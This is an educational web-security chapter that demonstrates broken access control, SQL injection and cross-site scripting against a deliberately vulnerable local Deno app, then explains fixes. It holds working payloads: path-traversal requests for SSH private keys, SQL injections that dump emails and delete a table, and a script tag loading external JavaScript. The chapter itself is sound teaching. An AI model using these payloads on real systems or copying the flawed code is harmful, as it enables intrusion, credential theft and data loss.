Users and Security

Web Security Basics

Learning Objectives

You know of some of the most common security risks in web applications.
You know where to find more information on web application security.

Plenty of websites are hacked every day. As flaws in web applications (and other applications) are continuously being sought by malicious users and organizations, it is not surprising that there is a cybersecurity workforce shortage. It is important that everyone who develops software knows at least the basics of building secure software, and knows how to maintain secure software.

The recent emergence of Generative AI in software engineering has not made the situation any easier. Generative AI systems may produce code with security flaws, but an extra problem is that users of such systems are biased towards trusting the outputs, even if the outputs are flawed.

For additional information, see e.g. the part Software Security and Large Language Models of the Software Engineering with Large Language Models course.

The most common issues with application security are related to developers’ lack of awareness or rigor as well as poor development practices. Developers may unintentionally leave bugs in their applications that allow attacks on the application or on its users. Developers may store sensitive information, such as passwords, in insecure locations like plaintext files or unencrypted databases that can be accessed or breached, and they may not actively keep the used libraries and other software up to date to mitigate emerging security concerns. They may even, as an example, host applications on a server that has other software with security flaws, which can lead to attacks through the flaws in that other software.

The responsibility does not lie with developers alone; it also lies with the companies that build the software and the companies that buy it. Resources need to be allocated to keep software secure, as new security issues keep emerging.

The Open Web Application Security Project® (OWASP) foundation works to improve software security and to provide resources for learning about securing web applications. They also maintain a guide on Web Application Security Testing and keep track of the (current) most critical security risks in web applications.

Here, we visit a few of the most common security risks in web applications. The list is based on the OWASP Top 10, which is a list of the ten most critical security risks in web applications.

Broken access control

Here, we look into an instance of broken access control and its implications. Using Vanilla Deno, we create an application that responds with a file based on the url in the request. In principle, such an application would be meaningful, as it would allow responding with e.g. any HTML documents in the current folder.

The folder structure of our application is as follows.

tree
.
├── app.js
└── index.html

0 directories, 2 files

The contents of the app.js are as follows, and the index.html is a simple HTML page.

Note that the following code is not secure and should never be used in a production environment.

const handleRequest = async (request) => {
  const url = new URL(request.url);
  const path = url.pathname.slice(1);

  return new Response(await Deno.readTextFile(path));
};

Deno.serve(handleRequest);

The application reads the request URL (i.e. the path) and responds with the file given in the path. As the pathname property of the URL object starts with a slash (/), the slice method is used to remove the first character of the path, so that the path refers to a file in the current folder.

The application serves files within the current folder nicely. For example, retrieving an index.html-page works, given that the application has been launched from the same folder where the index.html file resides.

curl http://localhost:8000/index.html
<!DOCTYPE html>
<html>
  <head>
    <title>Title</title>
  </head>
  <body>
    <h1>Hello world!</h1>
    <p>Oh noes, what an epic failure.</p>
  </body>
</html>%

In practice, we could also add other files to the folder, which would lead to a situation where our server serves the files whenever they are requested.

The question then is as follows: So, what’s wrong with this application and why should something like this never be done?

To answer the question, let’s look at what other things we could try to request. We can, obviously, request any file in the folder of the application, including the code that runs the application.

curl http://localhost:8000/app.js
const handleRequest = async (request) => {
  const url = new URL(request.url);
  const path = url.pathname.slice(1);

  return new Response(await Deno.readTextFile(path));
};

Deno.serve(handleRequest);

Because there are no limitations to the files that can be requested, and the only check is removing the first slash in the pathname, we can also try to access files in other folders. If the path starts with a double slash, only the first slash is removed; the remaining path still starts with a slash and is therefore treated as an absolute path, which allows digging into the file system.
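The effect of the double slash can be checked with a minimal sketch that uses the same URL parsing and slice call as app.js. The helper name toFilePath is made up for this illustration.

```javascript
// Hypothetical helper: mirrors the two lines in app.js that turn a
// request URL into a file path.
const toFilePath = (requestUrl) => {
  const url = new URL(requestUrl);
  return url.pathname.slice(1);
};

// One leading slash: the result is a relative path in the current folder.
console.log(toFilePath("http://localhost:8000/index.html"));
// prints "index.html"

// Two leading slashes: one slash remains, so the result is an absolute path.
console.log(toFilePath("http://localhost:8000//home/server/.gitconfig"));
// prints "/home/server/.gitconfig"
```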

As an example, we could guess that there exists a user called “server” and try to access, say, the git configuration file .gitconfig.

curl http://localhost:8000//home/server/.gitconfig
(real content from the config file)

Similarly, in Dockerized applications, the folder /app is often used as the directory for the application.

Gaining access to the .gitconfig means that we likely have access to other files that should not be accessible. Let’s take a peek at the SSH keys that are used to secure connections between computers.

curl http://localhost:8000//home/server/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: [content]
DEK-Info: [content]

[content]
-----END RSA PRIVATE KEY-----

Well. Oops. Now this could lead to a bunch of problems. We surely do not want anyone to have access to our private keys, or to any other private content.

The above example illustrates why it is important to prevent access to files that should not be accessed. The application should have been limited to serving files from the current folder only and, in addition, to serving only those files that are explicitly allowed to be served. In practice, this would mean serving only the index.html file.
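One possible way to restrict the application to explicitly allowed files is an allowlist. The following is a minimal sketch, not a complete static file server; the names ALLOWED_FILES and resolveAllowedFile are made up for this illustration, and the 404 response is an assumption about how disallowed requests could be handled.

```javascript
// Hypothetical allowlist: only these file names may ever be served.
const ALLOWED_FILES = new Set(["index.html"]);

// Maps a URL pathname to an allowed file name, or to null when the
// requested file is not on the allowlist.
const resolveAllowedFile = (pathname) => {
  const name = pathname.slice(1);
  return ALLOWED_FILES.has(name) ? name : null;
};

const handleRequest = async (request) => {
  const url = new URL(request.url);
  const file = resolveAllowedFile(url.pathname);

  // Anything not explicitly allowed is rejected before touching the disk.
  if (file === null) {
    return new Response("Not found", { status: 404 });
  }

  return new Response(await Deno.readTextFile(file));
};
```

As in the original app.js, the handler would be passed to Deno.serve. With this check, requests for /app.js or //home/server/.ssh/id_rsa never reach Deno.readTextFile, because neither name is in the allowlist.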

There were also other problems, such as exposing private keys on a server accessible via the internet, which should never be done. The private keys should be stored in a secure location, and — in the case of ssh keys — the keys should be password protected.

When using Deno, we can use the --allow-read flag to grant folder-specific read permissions, which adds another safeguard against mistakes like the one above. For additional details, see the chapter on security and permissions in the Deno documentation.

Injection flaws

Injection flaws allow an attacker to inject malicious code into the application. The injected code is then executed in a context where it should not be executed, such as the database or the command prompt of the operating system. The possibility to execute code allows the attacker to e.g. access data without authentication or authorization, to create new processes on the server, and, in the worst case, to take full control of the server.

Injection flaws are typically related to processing forms or other content that is sent to the server. As an example, one possible flaw could allow the user of the application to add evil code through a login form, which then — when the form is submitted — would cause havoc on the server.

One family of injection flaws is SQL injection. In practice, SQL injection flaws create an opportunity for the user to execute arbitrary SQL commands on the server. Such a flaw is typically a product of poorly sanitized input data and of not using parameterized queries. As an example, if the database driver allowed adding strings to the query as is, a programmer could implement a database query for inserting data into the database as follows (the example works with a table called names).

const createName = async (name) => {
  // NEVER EVER DO THIS:
  const query = "INSERT INTO names (name) VALUES ('" + name + "')";
  // assuming that the query would be executed next
};

The question then is as follows: So, where is the flaw — and if there is one, it must be just a small thing, right?

The following example is intended for educational purposes only — exploiting such vulnerabilities without permission is illegal and unethical.

The following example demonstrates what a single SQL injection flaw can lead to. We start by using an API that uses the above code to add data to the database as it should be used — when we POST a name to the database, everything seems to be in order.

curl -X POST -d "name=Hello" http://localhost:8000
curl http://localhost:8000
[{"id":81,"name":"Hello"}]%

Knowing some SQL, with guessing and trickery, we test whether we can insert multiple names.

curl -X POST -d "name=Hello2'),('Hello3'),('Hello4?" http://localhost:8000
curl http://localhost:8000
[{"id":81,"name":"Hello"},{"id":82,"name":"Hello2"},{"id":83,"name":"Hello3"},{"id":84,"name":"Hello4?"}]%

Oh, yes we can! At this point, we would know that the application is likely doomed. After some time spent on trying different table names (omitted here), we figure out the name of the database table that the API uses — in this case it is names — and that the table has a column called name. In addition, the GET request to the API lists the contents of the names table. Now, the world is ours.
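To see why the multi-value input works, the following sketch builds the query string the same way as the flawed createName function and prints the result. The helper name buildQuery is made up for this illustration; nothing is sent to a database.

```javascript
// Hypothetical helper: concatenates the input into the query exactly
// like the flawed createName function does.
const buildQuery = (name) =>
  "INSERT INTO names (name) VALUES ('" + name + "')";

// Intended use: the input stays inside the quotes.
console.log(buildQuery("Hello"));
// prints: INSERT INTO names (name) VALUES ('Hello')

// Injected input: the quotes and parentheses in the input close the
// first value and open two more.
console.log(buildQuery("Hello2'),('Hello3'),('Hello4?"));
// prints: INSERT INTO names (name) VALUES ('Hello2'),('Hello3'),('Hello4?')
```

The second query is valid SQL that inserts three rows, which matches the three new names seen in the API response.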

We continue by figuring out all the database tables. In the following example, using the SQL injection flaw, we read all the table names from the database and insert them into the table names. This is followed by reading the table names using the API. The -- at the end starts an SQL comment, so the SQL code that follows the injected value is ignored and no syntax error occurs.

curl -X POST -d "name=I am so sorry.'); INSERT INTO names (name) SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';-- -" http://localhost:8000
curl http://localhost:8000
[{"id":289,"name":"I am so sorry."},{"id":290,"name":"names"},{"id":291,"name":"songs"},{"id":292,"name":"messages"},{"id":293,"name":"news"},{"id":294,"name":"users"}, ..]%

Then, once we have figured out the table names, we look into table columns. In the following example, we read the columns of the users table that we just found in the database.

curl -X POST -d "name=I am so sorry.'); INSERT INTO names (name) SELECT column_name FROM information_schema.columns WHERE table_name = 'users';-- -" http://localhost:8000
curl http://localhost:8000
[{"id":301,"name":"I am so sorry."},{"id":302,"name":"id"},{"id":303,"name":"email"},{"id":304,"name":"password"},...]%

Now that we know the column names of the users table, we can — for example — expose and download all the emails in the database.

curl -X POST -d "name=I am so sorry.'); INSERT INTO names (name) SELECT email FROM users;-- -" http://localhost:8000
curl http://localhost:8000
[...,{"id":306,"name":"my@email.net"},{"id":307,"name":"email@email.net"},{"id":308,"name":"mail@mail.net"},{"id":309,"name":"my@mail.net"},{"id":310,"name":"secret@email.net"},...]%

Similarly, we could also download the passwords of the users, as the table users has a column called password. And, well, we could naturally do other not so nice things. We could, for example, delete all the data in the database. In the following example, we delete all the data from the table names.

curl -X POST -d "name=I am so sorry.'); DELETE FROM names;-- -" http://localhost:8000
curl http://localhost:8000
[]%

As we can see above, the response from the API is empty: the names table has been cleared.

So, where did this SQL injection flaw come from? It stemmed from the possibility of inserting code into the SQL query.

  // NEVER EVER DO THIS:
  const query = "INSERT INTO names (name) VALUES ('" + name + "')";
  // assuming that the query would be executed next

As we observed from the example above, if there is even a single such place in an application, all of the data can be compromised. The basic approach that we have taken so far to prevent this is the use of query parameters through Postgres.js, i.e. writing queries as follows.

// ...
await sql`INSERT INTO names (name) VALUES (${name})`;
// ...

This way, Postgres.js preprocesses the query, distinguishing between SQL code and parameters. All parameters are handled as values (not SQL code). Even if we added SQL code to a parameter, it would be handled as a string and not as something to be executed.
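The separation is possible because a JavaScript tagged template hands the tag function the fixed string parts and the interpolated values as separate arguments. The following sketch illustrates the idea with a made-up tag function called sketchSql; it is an assumption-laden illustration and not how Postgres.js is implemented internally.

```javascript
// Hypothetical tag function for illustration only; it does not talk to
// a database and is NOT the Postgres.js implementation.
const sketchSql = (strings, ...values) => {
  // Join the fixed SQL parts with numbered placeholders ($1, $2, ...).
  // The interpolated values never become part of the SQL text.
  const text = strings.reduce((acc, part, i) => acc + "$" + i + part);
  return { text, values };
};

const evilName = "I am so sorry.'); DELETE FROM names;-- -";
const query = sketchSql`INSERT INTO names (name) VALUES (${evilName})`;

console.log(query.text);
// prints: INSERT INTO names (name) VALUES ($1)
console.log(query.values.length);
// prints: 1
```

The malicious input ends up as a single entry in the list of values, while the SQL text contains only a placeholder.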

Exploits of a Mom

Now, the following XKCD comic “Exploits of a Mom” should make plenty of sense.

Cross-site scripting

Cross-site scripting (XSS) is a specific type of injection attack found in web applications. In cross-site scripting, the site provides an attacker the possibility of injecting client-side scripts into the application, which are then executed on other users’ computers as they access the application.

The starting point of an XSS attack is injecting code into the application. This can be done through, for example, a form or an API endpoint. Contrary to SQL injection and other injection flaws, cross-site scripting does not lead to the code being executed on the server. The server simply stores the code.

Once the code is stored on the server, the server compromises its users. Whenever a user requests content from the server that has the malicious code, the server responds to the request normally, sending the content to the user. Now, when the user retrieves the content with the malicious code, the content will be processed by the browser and the code will be executed. This can, for example, lead to the browser crashing, or to worse effects such as compromising content stored within the browser.

As an example, if an application constructs a response from data in the database without checking the content, a malicious user can inject client-side scripts into the output shown to other users.

// app

const getNamesHtml = async () => {
  const rows = await sql`SELECT * FROM names`;

  const names = rows
    .map((o) => `<li>${o.name}</li>`)
    .reduce((acc, o) => acc + o + "\n", "");

  return `<html>
    <body>
      <ul>
        ${names}
      </ul>
    </body>
  </html>`;
};

// using the above function to create a response and send it to the user

Let’s see how this could be exploited, given that there would be a possibility to add information e.g. via a form. The example below shows that when we make a query to the application, we see a list of names. In this case, there is just one name in the database.

curl http://localhost:8000
<html>
  <body>
    <ul>
      <li>Hello!</li>
    </ul>
  </body>
</html>%

Let’s add a new name. We try out if we could emphasize the name by adding a strong element around the name.

curl -X POST -d "name=<strong>Test</strong>" http://localhost:8000
curl http://localhost:8000
<html>
  <body>
    <ul>
      <li>Hello!</li>
<li><strong>Test</strong></li>
    </ul>
  </body>
</html>%

We can! Yay! Any user accessing the application using a browser will see the name Test emphasized.

This may mean that we can inject any content to the site — including JavaScript. In the next example, we try injecting a JavaScript file loaded from an external address to the site. As an example, we use the code at:

https://gist.githubusercontent.com/avihavai/c91260e5856eae21a0fbad1f2b891895/raw/336cdd0d85e48c42e53563938495e34fbccb6f00/injection-example.js

If successful, browsers of users accessing the site would load the script and execute it after page load. This would allow the attacker, for example, to replace the site content with something else, to place a keylogger on the site, to mine bitcoins with the users’ computers, and, possibly, to cause harm to the user on other sites as well.

curl -X POST -d "name=<script src='(path from above)' defer></script>" http://localhost:8000
curl http://localhost:8000
<html>
  <body>
    <ul>
      <li>Hello!</li>
<li><strong>Test</strong></li>
<li><script src='(path from above)' defer></script></li>
    </ul>
  </body>
</html>%

So, where did this cross-site scripting flaw come from? It stemmed from the possibility of inserting non-escaped HTML code to the page. When retrieving data from the database, characters indicating the start and end of HTML elements were not escaped, which led to the elements being interpreted as normal HTML.

// ...
  const names = rows
    .map((o) => `<li>${o.name}</li>`)
    .reduce((acc, o) => acc + o + "\n", "");

  return `<html>
    <body>
      <ul>
        ${names}
      </ul>
    </body>
  </html>`;
// ...

One way to solve this is to escape special characters such as <, >, &, and " before adding the data to the page, which prevents unintended HTML or JavaScript execution.
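A minimal sketch of such escaping is shown below. The function names escapeHtml and toListItem are made up for this illustration; the sketch covers text placed between HTML tags or inside quoted attribute values, and in practice a template engine or an established library would typically handle escaping.

```javascript
// Hypothetical helper: replaces characters that have a special meaning
// in HTML with their entity equivalents. The ampersand is replaced
// first so that the entities added by later steps are not escaped again.
const escapeHtml = (value) =>
  String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");

// Hypothetical helper: builds a list item from untrusted data.
const toListItem = (name) => `<li>${escapeHtml(name)}</li>`;

console.log(toListItem("<strong>Test</strong>"));
// prints: <li>&lt;strong&gt;Test&lt;/strong&gt;</li>
```

With the escaping in place, the browser shows the injected markup as plain text instead of interpreting it as HTML elements or scripts.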

Again, if there is even a single such place in an application, other users of the application can be compromised. While the above example shows a simple example where HTML content is created on the server, the same flaw can occur also in e.g. sites created with Eta or with sites where the content is retrieved from an API with JavaScript and then shown on the page.